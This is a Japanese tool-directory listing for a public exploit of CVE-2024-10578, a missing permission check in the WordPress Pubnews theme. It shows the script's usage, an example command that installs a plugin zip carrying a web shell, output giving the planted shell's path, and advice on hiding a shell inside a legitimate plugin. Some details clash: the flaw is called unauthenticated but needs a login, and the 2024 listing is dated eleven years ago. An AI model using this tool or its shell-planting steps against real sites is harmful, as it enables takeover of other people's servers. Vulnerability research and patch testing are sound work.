Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-10578 — Pubnews <= 1.0.7 - 未認証の任意プラグインインストール | Kitploit
ツール/GitHubGitHub/nxploited/cve-2024-10578
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ペイロード開発
GitHubnxploited/cve-2024-10578

CVE-2024-10578

Pubnews <= 1.0.7 - 未認証の任意プラグインインストール

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-10578: Pubnews <= 1.0.7 - 未認証の任意プラグインインストール

説明

WordPress 用 Pubnews テーマは、1.0.7 までの全バージョンにおいて、pubnews_importer_plugin_action_for_notice() 関数の権限チェックが欠如しているため、認可されていない任意のプラグインインストールに対して脆弱です。この脆弱性により、Subscriber レベル以上のアクセス権を持つ認証済み攻撃者が任意のプラグインをインストールでき、そのプラグインを利用して他の脆弱性を悪用することが可能になります。

CWE

  • CWE-434: 危険なタイプのファイルの無制限アップロード

CVSS

  • スコア: 8.8 (高)
  • バージョン: 3.1
  • ベクトル文字列: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

エクスプロイトスクリプト: wordpress_exploit.py

このスクリプトは、Pubnews テーマの脆弱性を悪用して、提供された URL から任意のプラグインをインストールします。プラグインには、悪意のあるシェルやその他のペイロードを含めることができます。

使用方法

root@kitploit:~

CVE-2024-10578.py [-h] -u URL -un USERNAME -p PASSWORD -url_zip PLUGIN_URL

Pubnews <= 1.0.7 - Unauthenticated Arbitrary Plugin Installation # By Nxploited, Khaled alenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         The URL of the WordPress site
  -un, --username USERNAME
                        The username for WordPress login
  -p, --password PASSWORD
                        The password for WordPress login
  -url_zip, --plugin_url PLUGIN_URL
                        The plugin URL to install (must be a zip file with the shell injected inside)

使用例

root@kitploit:~
python 
CVE-2024-10578.py -u http://target/wordpress -un admin -p admin -url_zip http://target/shell1.zip

出力

root@kitploit:~
[+] Logged in successfully.
[+] Admin _wpnonce extracted: 6bf22371ab
[+] Plugin installed successfully.
[+] Plugin extracted. You can find the shell here: /wp-content/plugins/shell1/

重要な注意事項

  • プラグイン URL は、シェルまたはその他のペイロードを含む zip ファイルへの直接リンクである必要があります。
  • 既存の WordPress プラグインを使用し、その内部にシェルを注入してから再度 zip 化することをお勧めします。この zip ファイルを直接リンクにアップロードして悪用します。

⚠️ 免責事項

このスクリプトは教育目的のみを意図しています。作者は、このスクリプトを違法行為に使用することを容認しません。責任を持って、明示的な許可を得たシステムでのみ使用してください。

作者: Nxploited | Khaled Alenazi

ツールをダウンロード